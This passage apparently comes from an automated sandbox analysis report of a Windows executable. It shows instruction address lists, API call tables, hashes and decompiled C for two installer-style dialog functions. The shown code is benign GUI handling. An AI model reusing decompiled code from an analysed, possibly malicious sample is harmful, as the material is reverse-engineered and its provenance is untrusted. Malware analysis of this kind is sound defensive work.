                                                                                    0x004050b4
                                                                                    0x004050b6
                                                                                    0x004050b6
                                                                                    0x004050a6
                                                                                    0x004050a8
                                                                                    0x004050a8
                                                                                    0x004050d6
                                                                                    0x004050e2
                                                                                    0x004050f1
                                                                                    0x004050f1
                                                                                    0x004050f3
                                                                                    0x004050f6
                                                                                    0x004050ff
                                                                                    0x00000000
                                                                                    0x00405006
                                                                                    0x00405011
                                                                                    0x00405014
                                                                                    0x00405019
                                                                                    0x0040501b
                                                                                    0x0040501f
                                                                                    0x0040502f
                                                                                    0x00405039
                                                                                    0x0040503b
                                                                                    0x0040503e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405021
                                                                                    0x00405021
                                                                                    0x00405027
                                                                                    0x00405029
                                                                                    0x00405029
                                                                                    0x0040502a
                                                                                    0x0040502b
                                                                                    0x00000000
                                                                                    0x00405021
                                                                                    0x00405004
                                                                                    0x00404fdf
                                                                                    0x00404f22
                                                                                    0x00000000
                                                                                    0x00404f38
                                                                                    0x00404f42
                                                                                    0x00404f47
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404f59
                                                                                    0x00404f5e
                                                                                    0x00404f6a
                                                                                    0x00404f6a
                                                                                    0x00404f6c
                                                                                    0x00404f7b
                                                                                    0x00404f7d
                                                                                    0x00404f81
                                                                                    0x00404f84
                                                                                    0x00000000
                                                                                    0x00404f84
                                                                                    0x00404f22
                                                                                    0x00404bd6
                                                                                    0x00404bd9
                                                                                    0x00404bdc
                                                                                    0x00404bec
                                                                                    0x00404bff
                                                                                    0x00404c0a
                                                                                    0x00404c10
                                                                                    0x00404c1e
                                                                                    0x00404c31
                                                                                    0x00404c36
                                                                                    0x00404c41
                                                                                    0x00404c4a
                                                                                    0x00404c60
                                                                                    0x00404c70
                                                                                    0x00404c7c
                                                                                    0x00404c7c
                                                                                    0x00404c81
                                                                                    0x00404c87
                                                                                    0x00404c89
                                                                                    0x00404c8c
                                                                                    0x00404c91
                                                                                    0x00404c96
                                                                                    0x00404c98
                                                                                    0x00404c98
                                                                                    0x00404cb8
                                                                                    0x00404cb8
                                                                                    0x00404cba
                                                                                    0x00404cbb
                                                                                    0x00404cc0
                                                                                    0x00404cc6
                                                                                    0x00404cca
                                                                                    0x00404ccf
                                                                                    0x00404cd7
                                                                                    0x00404cdb
                                                                                    0x00404ce0
                                                                                    0x00404ce5
                                                                                    0x00404ced
                                                                                    0x00404cf0
                                                                                    0x00404dbf
                                                                                    0x00404dd2
                                                                                    0x00000000
                                                                                    0x00404cf6
                                                                                    0x00404cf9
                                                                                    0x00404cfc
                                                                                    0x00404cff
                                                                                    0x00404cff
                                                                                    0x00404d04
                                                                                    0x00404d0d
                                                                                    0x00404d10
                                                                                    0x00404d14
                                                                                    0x00404d17
                                                                                    0x00404d1a
                                                                                    0x00404d23
                                                                                    0x00404d2c
                                                                                    0x00404d2f
                                                                                    0x00404d32
                                                                                    0x00404d35
                                                                                    0x00404d73
                                                                                    0x00404d9e
                                                                                    0x00404d75
                                                                                    0x00404d84
                                                                                    0x00404d84
                                                                                    0x00404d37
                                                                                    0x00404d3a
                                                                                    0x00404d48
                                                                                    0x00404d52
                                                                                    0x00404d5a
                                                                                    0x00404d61
                                                                                    0x00404d6c
                                                                                    0x00404d6c
                                                                                    0x00404d35
                                                                                    0x00404da4
                                                                                    0x00404da5
                                                                                    0x00404db1
                                                                                    0x00404db1
                                                                                    0x00404dbd
                                                                                    0x00404dd8
                                                                                    0x00404ddb
                                                                                    0x00404df8
                                                                                    0x00000000
                                                                                    0x00404ddd
                                                                                    0x00404de2
                                                                                    0x00404deb
                                                                                    0x0040517d
                                                                                    0x0040518f
                                                                                    0x0040518f
                                                                                    0x00404ddb
                                                                                    0x00000000
                                                                                    0x00404dbd
                                                                                    0x00404cf0

                                                                                    APIs
                                                                                    • GetDlgItem.USER32 ref: 00404B97
                                                                                    • GetDlgItem.USER32 ref: 00404BA4
                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BF3
                                                                                    • LoadImageA.USER32 ref: 00404C0A
                                                                                    • SetWindowLongA.USER32 ref: 00404C24
                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C36
                                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404C4A
                                                                                    • SendMessageA.USER32(?,00001109,00000002), ref: 00404C60
                                                                                    • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C6C
                                                                                    • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404C7C
                                                                                    • DeleteObject.GDI32(00000110), ref: 00404C81
                                                                                    • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404CAC
                                                                                    • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404CB8
                                                                                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D52
                                                                                    • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404D82
                                                                                      • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE
                                                                                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D96
                                                                                    • GetWindowLongA.USER32 ref: 00404DC4
                                                                                    • SetWindowLongA.USER32 ref: 00404DD2
                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404DE2
                                                                                    • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404EDD
                                                                                    • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404F42
                                                                                    • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F57
                                                                                    • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404F7B
                                                                                    • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F9B
                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404FB0
                                                                                    • GlobalFree.KERNEL32 ref: 00404FC0
                                                                                    • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00405039
                                                                                    • SendMessageA.USER32(?,00001102,?,?), ref: 004050E2
                                                                                    • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004050F1
                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0040511B
                                                                                    • ShowWindow.USER32(?,00000000), ref: 00405169
                                                                                    • GetDlgItem.USER32 ref: 00405174
                                                                                    • ShowWindow.USER32(00000000), ref: 0040517B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                    • String ID: $M$N
                                                                                    • API String ID: 2564846305-813528018
                                                                                    • Opcode ID: 05a311050dda4b414fd1261923b8e6b7691581466e425b0fd9ae4ea99a1d7fb6
                                                                                    • Instruction ID: 99b70255f3faedab1c4ad885451b662392dfc0d6b29454a89b749d4faaca394f
                                                                                    • Opcode Fuzzy Hash: 05a311050dda4b414fd1261923b8e6b7691581466e425b0fd9ae4ea99a1d7fb6
                                                                                    • Instruction Fuzzy Hash: 5D027DB0A00209AFDB20DF94DD85AAE7BB5FB44354F50813AF610BA2E0D7798D52CF58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00403CA7, Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 84%
                                                                                    			E00403CA7(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t68;
				struct HWND__* _t74;
				signed int _t87;
				struct HWND__* _t92;
				signed int _t100;
				int _t104;
				signed int _t116;
				signed int _t117;
				int _t118;
				signed int _t123;
				struct HWND__* _t126;
				struct HWND__* _t127;
				int _t128;
				long _t131;
				int _t133;
				int _t134;
				void* _t135;
				void* _t143;

				_t116 = _a8;
				if(_t116 == 0x110 || _t116 == 0x408) {
					_t35 = _a12;
					_t126 = _a4;
					__eflags = _t116 - 0x110;
					 *0x42a878 = _t35;
					if(_t116 == 0x110) {
						 *0x42f428 = _t126;
						 *0x42a88c = GetDlgItem(_t126, 1);
						_t92 = GetDlgItem(_t126, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x429858 = _t92;
						E0040417B(_t126);
						SetClassLongA(_t126, 0xfffffff2,  *0x42ec08);
						 *0x42ebec = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42a878 = 1;
					}
					_t123 =  *0x40a1dc; // 0xffffffff
					_t134 = 0;
					_t131 = (_t123 << 6) +  *0x42f460;
					__eflags = _t123;
					if(_t123 < 0) {
						L34:
						E004041C7(0x40b);
						while(1) {
							_t37 =  *0x42a878;
							 *0x40a1dc =  *0x40a1dc + _t37;
							_t131 = _t131 + (_t37 << 6);
							_t39 =  *0x40a1dc; // 0xffffffff
							__eflags = _t39 -  *0x42f464;
							if(_t39 ==  *0x42f464) {
								E0040140B(1);
							}
							__eflags =  *0x42ebec - _t134; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a1dc -  *0x42f464; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t131 + 0x14);
							E0040618A(_t117, _t126, _t131, 0x437800,  *((intOrPtr*)(_t131 + 0x24)));
							_push( *((intOrPtr*)(_t131 + 0x20)));
							_push(0xfffffc19);
							E0040417B(_t126);
							_push( *((intOrPtr*)(_t131 + 0x1c)));
							_push(0xfffffc1b);
							E0040417B(_t126);
							_push( *((intOrPtr*)(_t131 + 0x28)));
							_push(0xfffffc1a);
							E0040417B(_t126);
							_t49 = GetDlgItem(_t126, 3);
							__eflags =  *0x42f4cc - _t134;
							_v32 = _t49;
							if( *0x42f4cc != _t134) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t49, _t117 & 0x00000008);
							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
							E0040419D(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x429858, _t118);
							__eflags = _t118 - _t134;
							if(_t118 == _t134) {
								_push(1);
							} else {
								_push(_t134);
							}
							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
							__eflags =  *0x42f4cc - _t134;
							if( *0x42f4cc == _t134) {
								_push( *0x42a88c);
							} else {
								SendMessageA(_t126, 0x401, 2, _t134);
								_push( *0x429858);
							}
							E004041B0();
							E004060F7(0x42a890, E00403C88());
							E0040618A(0x42a890, _t126, _t131,  &(0x42a890[lstrlenA(0x42a890)]),  *((intOrPtr*)(_t131 + 0x18)));
							SetWindowTextA(_t126, 0x42a890);
							_push(_t134);
							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
							__eflags = _t68;
							if(_t68 != 0) {
								continue;
							} else {
								__eflags =  *_t131 - _t134;
								if( *_t131 == _t134) {
									continue;
								}
								__eflags =  *(_t131 + 4) - 5;
								if( *(_t131 + 4) != 5) {
									DestroyWindow( *0x42ebf8);
									 *0x42a068 = _t131;
									__eflags =  *_t131 - _t134;
									if( *_t131 <= _t134) {
										goto L58;
									}
									_t74 = CreateDialogParamA( *0x42f420,  *_t131 +  *0x42ec00 & 0x0000ffff, _t126,  *(0x40a1e0 +  *(_t131 + 4) * 4), _t131);
									__eflags = _t74 - _t134;
									 *0x42ebf8 = _t74;
									if(_t74 == _t134) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t131 + 0x2c)));
									_push(6);
									E0040417B(_t74);
									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
									ScreenToClient(_t126, _t135 + 0x10);
									SetWindowPos( *0x42ebf8, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
									_push(_t134);
									E00401389( *((intOrPtr*)(_t131 + 0xc)));
									__eflags =  *0x42ebec - _t134; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x42ebf8, 8);
									E004041C7(0x405);
									goto L58;
								}
								__eflags =  *0x42f4cc - _t134;
								if( *0x42f4cc != _t134) {
									goto L61;
								}
								__eflags =  *0x42f4c0 - _t134;
								if( *0x42f4c0 != _t134) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42ebf8);
						 *0x42f428 = _t134;
						EndDialog(_t126,  *0x429c60);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t131 - _t134;
							if( *_t131 == _t134) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
						__eflags = _t87;
						if(_t87 == 0) {
							goto L33;
						}
						SendMessageA( *0x42ebf8, 0x40f, 0, 1);
						__eflags =  *0x42ebec - _t134; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t126 = _a4;
					_t134 = 0;
					if(_t116 == 0x47) {
						SetWindowPos( *0x42a870, _t126, 0, 0, 0, 0, 0x13);
					}
					if(_t116 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42a870,  ~(_a12 - 1) & _t116);
					}
					if(_t116 != 0x40d) {
						__eflags = _t116 - 0x11;
						if(_t116 != 0x11) {
							__eflags = _t116 - 0x111;
							if(_t116 != 0x111) {
								L26:
								return E004041E2(_t116, _a12, _a16);
							}
							_t133 = _a12 & 0x0000ffff;
							_t127 = GetDlgItem(_t126, _t133);
							__eflags = _t127 - _t134;
							if(_t127 == _t134) {
								L13:
								__eflags = _t133 - 1;
								if(_t133 != 1) {
									__eflags = _t133 - 3;
									if(_t133 != 3) {
										_t128 = 2;
										__eflags = _t133 - _t128;
										if(_t133 != _t128) {
											L25:
											SendMessageA( *0x42ebf8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42f4cc - _t134;
										if( *0x42f4cc == _t134) {
											_t100 = E0040140B(3);
											__eflags = _t100;
											if(_t100 != 0) {
												goto L26;
											}
											 *0x429c60 = 1;
											L21:
											_push(0x78);
											L22:
											E00404154();
											goto L26;
										}
										E0040140B(_t128);
										 *0x429c60 = _t128;
										goto L21;
									}
									__eflags =  *0x40a1dc - _t134; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t133);
								goto L22;
							}
							SendMessageA(_t127, 0xf3, _t134, _t134);
							_t104 = IsWindowEnabled(_t127);
							__eflags = _t104;
							if(_t104 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t126, _t134, _t134);
						return 1;
					} else {
						DestroyWindow( *0x42ebf8);
						 *0x42ebf8 = _a12;
						L58:
						if( *0x42b890 == _t134) {
							_t143 =  *0x42ebf8 - _t134; // 0x0
							if(_t143 != 0) {
								ShowWindow(_t126, 0xa);
								 *0x42b890 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}































                                                                                    0x00403cb0
                                                                                    0x00403cb9
                                                                                    0x00403dfa
                                                                                    0x00403dfe
                                                                                    0x00403e02
                                                                                    0x00403e04
                                                                                    0x00403e09
                                                                                    0x00403e14
                                                                                    0x00403e1f
                                                                                    0x00403e24
                                                                                    0x00403e26
                                                                                    0x00403e28
                                                                                    0x00403e2b
                                                                                    0x00403e30
                                                                                    0x00403e3e
                                                                                    0x00403e4b
                                                                                    0x00403e52
                                                                                    0x00403e52
                                                                                    0x00403e53
                                                                                    0x00403e53
                                                                                    0x00403e58
                                                                                    0x00403e5e
                                                                                    0x00403e65
                                                                                    0x00403e6b
                                                                                    0x00403e6d
                                                                                    0x00403ead
                                                                                    0x00403eb2
                                                                                    0x00403eb7
                                                                                    0x00403eb7
                                                                                    0x00403ebc
                                                                                    0x00403ec5
                                                                                    0x00403ec7
                                                                                    0x00403ecc
                                                                                    0x00403ed2
                                                                                    0x00403ed6
                                                                                    0x00403ed6
                                                                                    0x00403edb
                                                                                    0x00403ee1
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403eec
                                                                                    0x00403ef2
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403efb
                                                                                    0x00403f03
                                                                                    0x00403f08
                                                                                    0x00403f0b
                                                                                    0x00403f11
                                                                                    0x00403f16
                                                                                    0x00403f19
                                                                                    0x00403f1f
                                                                                    0x00403f24
                                                                                    0x00403f27
                                                                                    0x00403f2d
                                                                                    0x00403f35
                                                                                    0x00403f3b
                                                                                    0x00403f41
                                                                                    0x00403f45
                                                                                    0x00403f4c
                                                                                    0x00403f4c
                                                                                    0x00403f4c
                                                                                    0x00403f56
                                                                                    0x00403f68
                                                                                    0x00403f74
                                                                                    0x00403f79
                                                                                    0x00403f83
                                                                                    0x00403f89
                                                                                    0x00403f8b
                                                                                    0x00403f90
                                                                                    0x00403f8d
                                                                                    0x00403f8d
                                                                                    0x00403f8d
                                                                                    0x00403fa0
                                                                                    0x00403fb8
                                                                                    0x00403fba
                                                                                    0x00403fc0
                                                                                    0x00403fd5
                                                                                    0x00403fc2
                                                                                    0x00403fcb
                                                                                    0x00403fcd
                                                                                    0x00403fcd
                                                                                    0x00403fdb
                                                                                    0x00403fec
                                                                                    0x00403ffd
                                                                                    0x00404004
                                                                                    0x0040400a
                                                                                    0x0040400e
                                                                                    0x00404013
                                                                                    0x00404015
                                                                                    0x00000000
                                                                                    0x0040401b
                                                                                    0x0040401b
                                                                                    0x0040401d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404023
                                                                                    0x00404027
                                                                                    0x0040404c
                                                                                    0x00404052
                                                                                    0x00404058
                                                                                    0x0040405a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404080
                                                                                    0x00404086
                                                                                    0x00404088
                                                                                    0x0040408d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404093
                                                                                    0x00404096
                                                                                    0x00404099
                                                                                    0x004040b0
                                                                                    0x004040bc
                                                                                    0x004040d5
                                                                                    0x004040db
                                                                                    0x004040df
                                                                                    0x004040e4
                                                                                    0x004040ea
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004040f4
                                                                                    0x004040ff
                                                                                    0x00000000
                                                                                    0x004040ff
                                                                                    0x00404029
                                                                                    0x0040402f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404035
                                                                                    0x0040403b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404041
                                                                                    0x00404015
                                                                                    0x0040410c
                                                                                    0x00404118
                                                                                    0x0040411f
                                                                                    0x00000000
                                                                                    0x00403e6f
                                                                                    0x00403e6f
                                                                                    0x00403e72
                                                                                    0x00403ea5
                                                                                    0x00403ea5
                                                                                    0x00403ea7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403ea7
                                                                                    0x00403e74
                                                                                    0x00403e78
                                                                                    0x00403e7d
                                                                                    0x00403e7f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403e8f
                                                                                    0x00403e97
                                                                                    0x00000000
                                                                                    0x00403e9d
                                                                                    0x00403ccb
                                                                                    0x00403ccb
                                                                                    0x00403ccf
                                                                                    0x00403cd4
                                                                                    0x00403ce3
                                                                                    0x00403ce3
                                                                                    0x00403cec
                                                                                    0x00403cf5
                                                                                    0x00403d00
                                                                                    0x00403d00
                                                                                    0x00403d0c
                                                                                    0x00403d28
                                                                                    0x00403d2b
                                                                                    0x00403d3e
                                                                                    0x00403d44
                                                                                    0x00403de7
                                                                                    0x00000000
                                                                                    0x00403df0
                                                                                    0x00403d4a
                                                                                    0x00403d57
                                                                                    0x00403d59
                                                                                    0x00403d5b
                                                                                    0x00403d7a
                                                                                    0x00403d7a
                                                                                    0x00403d7d
                                                                                    0x00403d82
                                                                                    0x00403d85
                                                                                    0x00403d95
                                                                                    0x00403d96
                                                                                    0x00403d98
                                                                                    0x00403dce
                                                                                    0x00403de1
                                                                                    0x00000000
                                                                                    0x00403de1
                                                                                    0x00403d9a
                                                                                    0x00403da0
                                                                                    0x00403db9
                                                                                    0x00403dbe
                                                                                    0x00403dc0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403dc2
                                                                                    0x00403dae
                                                                                    0x00403dae
                                                                                    0x00403db0
                                                                                    0x00403db0
                                                                                    0x00000000
                                                                                    0x00403db0
                                                                                    0x00403da3
                                                                                    0x00403da8
                                                                                    0x00000000
                                                                                    0x00403da8
                                                                                    0x00403d87
                                                                                    0x00403d8d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403d8f
                                                                                    0x00000000
                                                                                    0x00403d8f
                                                                                    0x00403d7f
                                                                                    0x00000000
                                                                                    0x00403d7f
                                                                                    0x00403d65
                                                                                    0x00403d6c
                                                                                    0x00403d72
                                                                                    0x00403d74
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403d74
                                                                                    0x00403d30
                                                                                    0x00000000
                                                                                    0x00403d0e
                                                                                    0x00403d14
                                                                                    0x00403d1e
                                                                                    0x00404125
                                                                                    0x0040412b
                                                                                    0x0040412d
                                                                                    0x00404133
                                                                                    0x00404138
                                                                                    0x0040413e
                                                                                    0x0040413e
                                                                                    0x00404133
                                                                                    0x00404148
                                                                                    0x00000000
                                                                                    0x00404148
                                                                                    0x00403d0c

                                                                                    APIs
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CE3
                                                                                    • ShowWindow.USER32(?), ref: 00403D00
                                                                                    • DestroyWindow.USER32 ref: 00403D14
                                                                                    • SetWindowLongA.USER32 ref: 00403D30
                                                                                    • GetDlgItem.USER32 ref: 00403D51
                                                                                    • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D65
                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00403D6C
                                                                                    • GetDlgItem.USER32 ref: 00403E1A
                                                                                    • GetDlgItem.USER32 ref: 00403E24
                                                                                    • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403E3E
                                                                                    • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403E8F
                                                                                    • GetDlgItem.USER32 ref: 00403F35
                                                                                    • ShowWindow.USER32(00000000,?), ref: 00403F56
                                                                                    • EnableWindow.USER32(?,?), ref: 00403F68
                                                                                    • EnableWindow.USER32(?,?), ref: 00403F83
                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F99
                                                                                    • EnableMenuItem.USER32 ref: 00403FA0
                                                                                    • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403FB8
                                                                                    • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403FCB
                                                                                    • lstrlenA.KERNEL32(0042A890,?,0042A890,00000000), ref: 00403FF5
                                                                                    • SetWindowTextA.USER32(?,0042A890), ref: 00404004
                                                                                    • ShowWindow.USER32(?,0000000A), ref: 00404138
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 184305955-0
                                                                                    • Opcode ID: 7a5d9994b8b7d5483664d5ab44f9fe767d237ce2ed75d97b1bae36ca26718a9b
                                                                                    • Instruction ID: 5e2b37e592d4e435839d8b6e88a40281f914ef55e2ab9fcffeaa2cd4c4a1132c
                                                                                    • Opcode Fuzzy Hash: 7a5d9994b8b7d5483664d5ab44f9fe767d237ce2ed75d97b1bae36ca26718a9b
                                                                                    • Instruction Fuzzy Hash: 45C1D271600204AFDB21AF62ED88D2B3ABCEB95706F50053EF641B51F0CB799892DB1D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004042E6, Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202windowstringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 91%
                                                                                    			E004042E6(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				intOrPtr _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x42985c =  *0x42985c + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E004041E2(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x42e3c0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_push(1);
								E0040458A(_a4, _v8);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42f428, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42f428, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x42985c != 0) {
						goto L25;
					} else {
						_t112 =  *0x42a068 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E0040419D(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404566();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42ebfc; // 0x63d143
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x42f478;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E004042B1;
				E0040417B(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E0040417B(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E0040419D( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E004041B0(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x42f434 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				 *0x42985c = 0;
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x42985c = 0;
				return 0;
			}


















                                                                                    0x004042f6
                                                                                    0x0040441b
                                                                                    0x00404477
                                                                                    0x0040447b
                                                                                    0x00404548
                                                                                    0x0040454a
                                                                                    0x0040454a
                                                                                    0x00404550
                                                                                    0x00404550
                                                                                    0x00404553
                                                                                    0x00000000
                                                                                    0x0040455a
                                                                                    0x00404489
                                                                                    0x0040448b
                                                                                    0x00404495
                                                                                    0x004044a0
                                                                                    0x004044a3
